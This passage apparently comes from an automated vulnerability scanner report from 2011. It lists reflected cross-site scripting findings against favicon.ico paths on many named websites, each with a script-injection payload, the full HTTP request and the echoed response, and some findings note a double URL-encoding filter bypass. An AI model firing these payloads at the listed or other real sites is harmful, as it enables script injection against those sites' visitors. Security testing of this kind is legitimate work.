<input type="hidden" name="keypath" value="/favicon.icob0d43"><script>alert(1)</script>f53c8f63bfa" />
...[SNIP]...

5.12. http://www.myfacebooksmileys.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.myfacebooksmileys.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d1f"><script>alert(1)</script>f2df0242f94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80d1f"><script>alert(1)</script>f2df0242f94=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfacebooksmileys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>This site is no longer in use </title>

</head>
<frameset rows="100%,*
...[SNIP]...
<frame src="http://nadigo.com/NotInUse.html/favicon.ico?80d1f"><script>alert(1)</script>f2df0242f94=1" frameborder="0" />
...[SNIP]...

5.13. http://www.ntv.ru/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ntv.ru
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35f45<script>alert(1)</script>4c7b378069d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico35f45<script>alert(1)</script>4c7b378069d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ntv.ru
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 04:03:32 GMT
Content-Type: text/html; charset=Windows-1251
Connection: close
Expires: Tue, 01 Jan 1980 00:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=abcY53qgHDKnZ-85ml5_s; path=/
Content-Length: 12865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<t
...[SNIP]...
<code>404: /favicon.ico35f45<script>alert(1)</script>4c7b378069d</code>
...[SNIP]...

5.14. http://www.oldiestelevision.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.oldiestelevision.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd7d"><script>alert(1)</script>209ab156e81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?efd7d"><script>alert(1)</script>209ab156e81=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oldiestelevision.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1198

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>The Great TV Shows Of The 50's 60's & Roots Of Rock & Roll Oldies Televisio
...[SNIP]...
<frame src="http://xoteria.com/OLDIESTV.html/favicon.ico?efd7d"><script>alert(1)</script>209ab156e81=1" frameborder="0" />
...[SNIP]...

5.15. http://www.paint.net/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paint.net
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2061"><script>alert(1)</script>abb3c0f5f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e2061"><script>alert(1)</script>abb3c0f5f95=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paint.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 439

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>www.paint.net </title>

</head>
<frameset rows="100%,*" border="0">

...[SNIP]...
<frame src="http://www.getpaint.net/redirect/wp/index.html/favicon.ico?e2061"><script>alert(1)</script>abb3c0f5f95=1" frameborder="0" />
...[SNIP]...

5.16. http://www.peoplesgas.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.peoplesgas.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5fa9<a>3c1d96aa34b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?a5fa9<a>3c1d96aa34b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplesgas.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 04 May 2011 03:47:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=e6303b2fc1187c2f1e2e;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<em>http://www.peoplesgas.com/favicon.ico?a5fa9<a>3c1d96aa34b=1</em>
...[SNIP]...

5.17. http://www.reverendfun.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reverendfun.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421f5"><script>alert(1)</script>cac5f022d86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico421f5"><script>alert(1)</script>cac5f022d86 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverendfun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:38:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: r_id=334ec2afd06d6b495552edb41416a0dc; expires=Fri, 08-Jul-2033 22:05:30 GMT; path=/
Content-Length: 6280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<input size="50" name="to" value="http://www.reverendfun.com/favicon.ico421f5"><script>alert(1)</script>cac5f022d86" />
...[SNIP]...

5.18. http://www.rockymounttelegram.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rockymounttelegram.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feadd"><script>alert(1)</script>10a3d2557dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofeadd"><script>alert(1)</script>10a3d2557dc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rockymounttelegram.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:53:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESSafa15434f65814106549db0d4e89abee=83ce4ef73222cd847b28bf76507278bb; expires=Fri, 27-May-2011 04:24:02 GMT; path=/; domain=.rockymounttelegram.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:50:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
<A href="/user/login?destination=favicon.icofeadd"><script>alert(1)</script>10a3d2557dc">
...[SNIP]...

5.19. http://www.everydentist.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydentist.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee6f9--><script>alert(1)</script>14a6a88578b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydentist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=ee6f9--><script>alert(1)</script>14a6a88578b

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12345
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSARARCT=CIJJDBFAHJFGHIHBCNBEFIIM; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<
...[SNIP]...
<script>alert(1)</script>14a6a88578b-->
...[SNIP]...

5.20. http://www.idxcentral.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.idxcentral.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8e8"><a>0817078a05d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.idxcentral.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=5c8e8"><a>0817078a05d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=3768507;expires=Fri, 26-Apr-2041 01:47:26 GMT;path=/
Set-Cookie: CFTOKEN=35097486;expires=Fri, 26-Apr-2041 01:47:26 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:26 GMT
Content-Length: 3592

<html>
<head>
<title>Moineau Design :: Web Design</title>


<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="d
...[SNIP]...
<a href="javascript:;" onClick="ContactUs=window.open('http://www.mdadvertising.com/contact_general.cfm?Ref=http://www.google.com/search?hl=en&q=5c8e8"><a>0817078a05d&IP=173.193.214.243','ContactMoineauDesign','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes,width=475,height=510,left=50,top=50'); return false;">
...[SNIP]...

5.21. http://www.wardsci.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wardsci.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee639--><a>f2d1af9db6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wardsci.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=ee639--><a>f2d1af9db6e

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://wardsci.com/rc.asp?oc=SITE&ky=&bt=%2Farticle%2Easp%3Fai%3D230
Content-Length: 24556
Content-Type: text/html
Expires: Wed, 04 May 2011 03:44:40 GMT
Set-Cookie: CM%5Fcat=ARTICLE; expires=Thu, 03-May-2012 03:44:40 GMT; path=/
Set-Cookie: sh%5Fpr=Y; expires=Tue, 10-May-2011 04:00:00 GMT; path=/
Set-Cookie: rl=article%2Easp%3Fai%3D230; path=/
Set-Cookie: eid=; expires=Wed, 11-May-2011 03:44:40 GMT; path=/
Set-Cookie: sid=; path=/
Set-Cookie: ky=; expires=Wed, 11-May-2011 03:45:00 GMT; path=/
Set-Cookie: rt=Articles; path=/
Set-Cookie: oc=SITE; expires=Wed, 11-May-2011 03:45:00 GMT; path=/
Set-Cookie: id=154B9E954UE2; expires=Fri, 03-May-2013 03:44:40 GMT; path=/
Set-Cookie: ASPSESSIONIDAASQDCSC=DMDDAJNDJPPCEPMDFAGKEOEO; path=/
Cache-control: private

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

<title>404 Page Not Found</title>
<link rel="shortcut icon" href="http://vwreducation.com/images/wrd/favicon.ico" typ
...[SNIP]...
<a>f2d1af9db6e -->
...[SNIP]...

5.22. http://www.ammessages6.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ammessages6.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e65df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6568ea91091 was submitted in the REST URL parameter 1. This input was echoed as e65df"><script>alert(1)</script>6568ea91091 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /favicon.icoe65df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6568ea91091 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ammessages6.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 01:10:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://www.amateurmatch.com/favicon.icoe65df"><script>alert(1)</script>6568ea91091
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.icoe65df"><script>alert(1)</script>6568ea91091">here</a>.</body
...[SNIP]...

5.23. http://www.ammessages6.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ammessages6.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c807"><script>alert(1)</script>85d6f180f15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1c807"><script>alert(1)</script>85d6f180f15=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ammessages6.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 01:10:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash01
X-AspNet-Version: 2.0.50727
Content-Length: 206
Location: http://www.amateurmatch.com/favicon.ico?1c807"><script>alert(1)</script>85d6f180f15=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.ico?1c807"><script>alert(1)</script>85d6f180f15=1">here</a>.</b
...[SNIP]...

5.24. http://www.dbfx.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dbfx.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b53f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5819d5c5d30 was submitted in the REST URL parameter 1. This input was echoed as 7b53f"><script>alert(1)</script>5819d5c5d30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /favicon.ico7b53f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5819d5c5d30 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dbfx.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 02:46:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash01
X-AspNet-Version: 2.0.50727
Content-Length: 198
Location: http://www.e-forex.com/favicon.ico7b53f"><script>alert(1)</script>5819d5c5d30
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.e-forex.com/favicon.ico7b53f"><script>alert(1)</script>5819d5c5d30">here</a>.</body>

5.25. http://www.dbfx.net/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dbfx.net
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5aed"><script>alert(1)</script>a73e5cf0ad8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?c5aed"><script>alert(1)</script>a73e5cf0ad8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dbfx.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 02:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 201
Location: http://www.e-forex.com/favicon.ico?c5aed"><script>alert(1)</script>a73e5cf0ad8=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.e-forex.com/favicon.ico?c5aed"><script>alert(1)</script>a73e5cf0ad8=1">here</a>.</body>
...[SNIP]...

5.26. http://www.herbdoc.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.herbdoc.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b6685><script>alert(1)</script>4d07e5c9c45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icob6685><script>alert(1)</script>4d07e5c9c45 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herbdoc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: Apache
Connection: close
Content-Type: text/html
Location: https://www.herbdoc.com//favicon.icob6685><script>alert(1)</script>4d07e5c9c45

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>The Document has moved <A HREF=https://www.herbdoc.com//favicon.icob6685><script>alert(1)</script>4d07e5c9c45>
...[SNIP]...

5.27. http://www.herbdoc.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.herbdoc.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 26482><script>alert(1)</script>135ba67191a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?26482><script>alert(1)</script>135ba67191a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.herbdoc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: Apache
Connection: close
Content-Type: text/html
Location: https://www.herbdoc.com//favicon.ico?26482><script>alert(1)</script>135ba67191a=1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>The Document has moved <A HREF=https://www.herbdoc.com//favicon.ico?26482><script>alert(1)</script>135ba67191a=1>
...[SNIP]...

5.28. http://www.mannatech.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mannatech.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ee5"><script>alert(1)</script>a9efa941b56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoe6ee5"><script>alert(1)</script>a9efa941b56 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mannatech.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 260
Location: https://www.mannatech.com/favicon.icoe6ee5"><script>alert(1)</script>a9efa941b56
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:17:50 GMT
Connection: close

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.mannatech.com/favicon.icoe6ee5"><script>alert(1)</script>a9efa941b56">
...[SNIP]...

5.29. http://www.mannatech.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mannatech.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472db"><script>alert(1)</script>5fb6f99eb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

